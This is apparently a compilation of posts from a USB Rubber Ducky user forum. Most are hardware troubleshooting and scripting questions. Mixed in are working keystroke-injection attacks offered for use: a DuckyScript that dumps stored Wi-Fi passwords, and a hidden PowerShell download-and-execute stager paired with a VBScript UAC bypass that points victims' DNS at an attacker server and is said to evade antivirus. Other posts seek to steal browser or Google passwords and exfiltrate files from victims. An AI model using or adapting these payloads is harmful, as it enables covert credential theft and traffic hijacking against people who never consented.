Search the Community

Do I just need move the .bin file to cd card ? How could I write code so that I can let something save to my rubber ducky? thank you so much ?

So is there a way to make rubber ducky convert picture to text from certain part of the screen and then to type it? I don't mind using external programs. By typing text from image I mean just a photo of a document containing only text.

So, I'm not sure what to make of this. Maybe it's nothing. My friend was setting up a bunch of dells and noticed this http://www.dell.com/support/home/us/en/04/Drivers/DriversDetails?driverId=5DD13 it looks like just another driver, but HID and BIOS got me wondering. I found this link http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_150812_1 that gives a better description. I couldn't find anything online about what BIOS HID commands there could be. Why would the BIOS need access to HID? If it does have access, what keys does it have, and how do computers interpret them? Could this be exploited? I honestly can't find anything else, but I thought I'd post this in case anyone knows what it actually does and can debunk my curiosity.

Just received the brand new bunny, however. From what i can see it does not come with any other keyboard support then US (us.json). Any ATM for full keyboard support like the rubber ducky has? Any simple way of porting the language files from rubber ducky to this? I did take a look at the HID map to try to map my own xxx.json, i failed when it came to multiple key combination resulting in one output key. Any specific method to make this process ALLOT easier?

Ok, so here's a payoad that can grab any of the wifi info that the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt" Only works on Windows DELAY 1000 GUI r DELAY 500 STRING cmd ENTER DELAY 1000 REM The @ will be typed as " in the Command prompt STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A ENTER DELAY 100 STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A ENTER DELAY 100 STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A ENTER DELAY 100 STRING del A.txt ENTER DELAY 100 STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER Feel free to ask any questions and if there's any errors that need to be fixed on to this.

The programming language, dubbed DuckyScript, is a simple instruction-based interface to creating a customized payload. However, it runs independently from the microcontroller that installs the drivers to the machine. On some older models running Windows XP, the device took upwards of 60 seconds to install the drivers. On newer machines running Windows 7, it took anywhere from 10-30. And if the drivers take longer to install than the delay you put at the beginning of your payload, it will begin firing off anyways. Source: https://thehacktoday.com/60-best-rubber-ducky-usb-payloads/

Hello, In the recent episodes Darren showed how to use the USB rubber duck to exfiltrate specified files from a victims computer when they are logged in. I am wondering if there is any way of doing this when no one is logged in? and the computer is at the login screen. thanks!

This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: http://www.pastebin.com/raw/NEyDVtER ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie

Since I was introduced to a typewriter when I was 2 years old I have never bothered to practice and learn to type 60+ wpm never the less 900 - 1,200 WPM when the RbbrDucky is inserted. Repetition and with the aid of shorthand keyboard shortcuts has been the only way I have learned to make me appear to type as fast as a 60+ wpm Typer. ALT + Tab, Windows Key + R , I have become a mastermind of getting where I need to be in an OS using less keys that I have to type. Since a lot of tasks I perform are repetitious in Linux, especially in KALI, I have not read of anyone using the RubberDuck to automate their task as the super typer HID now becomes a scripted AI or "the hacker from Swordfish" mashing on the keys. So I wanted to create a new Thread dedicated to "Linux Only" whereby you are using Twin Duck firmware with option 1 "pressing caps lock" to activate the Duck inject.bin. I am not intending to hack Kali Linux or any Linux distro system with a payload. The objective is to have AI "superman" type for me what I would normally would type in Kali or any Linux distro to carry out an automated attack. Using Kali, I have enabled a custom keyboard shortcut in keyboard settings to open the terminal, my example "Super + t" or "CTRL + ALT + t" in my Ducky Payload Script WINDOWS t GUI t CTRL ALT t COMMAND t All do not open a custom terminal keyboard shortcut. So I am a bit stuck on this first step.

Hiya, how do I access the storage on my USB the USB has already been set to the right setting. The USB shows up in my OS for a second then leaves, it's also seeable under hidden files but it gives a output of "Please input drive F:"

I bought Rubber Ducky unfortunately with faulty DFU button. Now I’m trying to get replacement but no any response from hak5 shop for last two weeks. I wrote to Darren, Sara and to primary hak5 shop email but no replies in last two weeks, also no replacement to faulty Rubber Ducky. Guys is it shop is closed for holiday???

Hi there, This simple script doesnt seem to work: DELAY 3000 GUI SPACE <-- This doesnt open the Spotlight search bar DELAY 500 STRING texteditor.app DELAY 500 ENTER DELAY 750 STRING Hello World!!! ENTER Any ideas? Thanks! :-)

I got my field kit a couple of weeks ago and I got a ducky with a faulty DFU button. Its been 10 days and I haven't got any updates yet. I already sent a message to Darren and Sebkinne and sent an e-mail to support@hak5.org. It would really be awesome if I'd get an update on ticket # 31959 Thanks!

Hi, I'm new to using the Rubber Ducky, and when i compile the script I wrote, this is the output I get: Hak5 Duck Encoder 2.6.4 Loading File ..... [ OK ] Loading Keyboard File ..... [ OK ] Loading Language File ..... [ OK ] Loading DuckyScript ..... [ OK ] Error on Line: 8 java.lang.NumberFormatException: For input string: "3500\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 11 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 13 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 15 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 17 java.lang.NumberFormatException: For input string: "3100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 19 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 21 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) Error on Line: 23 java.lang.NumberFormatException: For input string: "100\" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65) at java.lang.Integer.parseInt(Integer.java:580) at java.lang.Integer.parseInt(Integer.java:615) at Encoder.encodeToFile(Encoder.java:240) at Encoder.main(Encoder.java:134) DuckyScript Complete..... [ OK ] Here's the script itself, it's quite simple. REM this script is for OSX. DELAY 3500 GUI M GUI SPACE DELAY 100 STRING photo booth DELAY 100 ENTER DELAY 100 ENTER DELAY 3100 GUI SPACE DELAY 100 STRING terminal DELAY 100 STRING say you just got your picture taken DELAY 100 ENTER I am using OSX. When I compile the .txt file, it still saves as inject.bin. However, when I put the sd in the ducky and try to run it, nothing happens. I'm assuming it's because of the errors when I compile, so how would I fix these? Thank you in advance!

/stext <Filename> Save the passwords list into a regular text file. this is the syntax to save the passwords into the text file. but when i execute it. I dont see any text file created. instead the program itself is opened.

(01) i was curious if there was a product somewhere that was a rubber ducky like device that was disguised as a USB charger (the logic board could possibly be in the Brick or a modified charger cord) and worked as one as well with the addition of the rubber ducky features if not i think that would be a useful innovation for someone capable of creating such a device to take advantage of this would be used to get info off of a phone that was connected to the rubber ducky like device if there are any downsides to this idea please let me know as well as if there are any pros to this mental exercise product

Recently got my usb rubber ducky in the mail and it's been working great so far, except it doesn't seem to want to enter DFU mode. Unlike other people on the forum, the replay button works just fine, I've tested it multiple times. I've followed every tutorial I could find and none seem to work, I've tried it in every usb port on my machine, with and without the microsd, but even though i start holding the button down well before i plug it in, and keep it held for a while after, the ducky executes the current payload as though i wasn't, and doesn't show up in the device manager at all (win10 64x). I'm loving it so far with the base firmware but i feel like I'm missing out on a big part of the fun if i can't flash it, any help or ideas would be greatly appreciated.

How to Make USB Rubber Ducky Scripts When Drive Letter is Unknown. Ever wanted to make script that could get a file from the USB Rubber Ducky SD card. If you have you probably have run into the problem that, every time you plug the USB Rubber Ducky into a different computer, it most likely has a different drive letter then the last computer you plugged it into. Which means you would have to go back and change the drive letter in the script. If you are having problems with this then your on the right page! What I am going to hopefully teach you in this page is how to overcoming this problem. Here I have an example of a script that I have wrote that uses the Twin Duck Firmware to change the wallpaper of the computer to a file on my USB Rubber Ducky SD card. ------------------------------------------ DELAY 1000 REM -----------Opens CMD----------- WINDOWS R DELAY 500 STRING cmd ENTER DELAY 600 REM -----------Sets Wallpaper to image in the DUCKY SD card----------- STRING reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d E:\target.bmp /f ENTER DELAY 200 REM -----------Refreshing the wallpaper----------- STRING RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ENTER DELAY 100 STRING exit ENTER ------------------------------------------ As you can see in the script, we open up cmd via run and then type in : ------------------------------------------------------------------------------------ reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d E:\target.bmp /f ------------------------------------------------------------------------------------ The underlined part of the the script is the path of the target.bmp image inside the USB Rubber Ducky's SD card. Now if your drive letter is always changing, your going to run into a problem when you go to execute the command on a different machine that has, lets say, made your USB Rubber Ducky's Path the letter V, your going to run into some problems. To overcome this problem is really, really simple. And is shown here in a altered version of the script ------------------------------------------ DELAY 1000 REM -----------Opens CMD----------- WINDOWS R DELAY 500 STRING cmd ENTER DELAY 600 REM -----------Sets %ducky% to DUCKY drive letter----------- STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set ducky=%d ENTER DELAY 100 REM -----------Sets Wallpaper to image in the DUCKY SD card----------- STRING reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d %ducky%/target.bmp /f ENTER DELAY 200 REM -----------Refreshing the wallpaper----------- STRING RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ENTER DELAY 100 STRING exit ENTER ------------------------------------------ As you can see, when cmd gets opened this script is typed in straight away and is executed: ------------------------------------------------------------------------------------ for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set ducky=%d ------------------------------------------------------------------------------------ The first thing that this command does is finds our Storage Device which is named 'DUCKY', which should be the SD card that is plugged into the USB Rubber Ducky. If your device's name is different you can either change the SD card name to 'DUCKY' or you can edit the command. If you want to change the command all you need to do is change 'DUCKY' in the command line to the name of your SD card, in the USB Rubber Ducky. The second thing the command does is make it so when you type in '%ducky% it will automatically make it mean the drive letter of the Ducky SD Card. For Example if I type in %ducky%/target.txt. It will open 'target.txt' in the 'DUCKY' SD Card, because %ducky% equals the drive letter of the SD card. Please note this can only be used in cmd, it will not work in another program like Run or File Explorer. I really hope this helps you guys if you have had this problem. If there is any wrong information in this post please let me know. Cheers, Bingoe33

This simple payload opens Terminal, moves to a directory and then creates a http server that you can go and download those files. You may want to change directory and the server port. In the payload the port is 8000 DELAY 1500 GUI SPACE DELAY 300 STRING Terminal DELAY 200 ENTER DELAY 500 STRING cd (directory to show) ENTER STRING python -m SimpleHTTPServer 8000 ENTER GUI M Directory Server.txt

I need help figuring out what to do i have no experience with the ducky and i can't even get it to run a hello world script please help

I've recently been having a problem with my Rubber Ducky USB. Whenever I try to execute a payload, Windows will either lock em out, or mess with the graphics so that it rotates the screen to Portrait Mode. (90 degrees) The payload I am currently working on will open an executable file by NirSoft, called WebBrowserPassView. Once opened, it will pull all cached passwords off of any web browser and save them back onto the DUCKY's SD Card. The executable file and all the needed files to run the payload are on the SD Card. (I used the Mini SD Card to USB Adapter) The problem is, I can't progress the project without Windows either locking up, or rotating the screen. This problem happens with running ANY payload now. I can't tell if it is something I did to it, or if this is just a glitch... Please Help! ._. If you need any other information, just contact me!

Hey guys, I recenlty bought a rubber ducky, all good with the delivery, it arrived on time. So I've watch quite a few tutorials on how to get started with rubber ducky etc but when i insert the payload it doesn't seem to load it. So to be sure i downloaded another payload from ducktoolkit.com which is suppose to be correct(from a proggramers view) but it didn't load either. So i thought maybe something was wrong with the sd card. I had a 2gb sd-card from my old phone, so i formatted it (Fat(the sd card that i received was formatted as FAT so i thought it should be the same format)) and tried it but it did not work either. Anyone know what the problem is? Is it possible that the ducky(hardware) is defect or is it a software problem? Anyone with similar experience? greetings, Henk

Im not sure why but when i encoded my script the line: $sourcedirectory = "G:\Java\*" showed up as $sourcedirectory = @G:\Java\*@ . This only happened when it was encoded using the duckytoolkit website.

I saw the rubber ducky and was VERY interested by it. I do not get how it fully works and would like to ask for a link or basic knowledge of it. I want to buy it ,but I am wondering if I did if I could get it to work. Or if it even is what I think it is. What I simply want from it is to place it into a computer and get google passwords. If anyone can help me with this it would be greatly appreciated.Don't hate on me. I know I am new to this and I'm reading over it and finding it very cringy as well.Thank You

So I was on youtube and found an interesting video regarding stealing data from another computer using Rubber Ducky. Basically the guy said U can straight up plug it in another PC and get the data from that computer sent to your machine OTA. From what I understood the data that's supposed to be acquired isn't stored on the drive, but directly being sent to you(maybe by using the victim's network). My question is - Can this actually be done and, if yes then how exactly?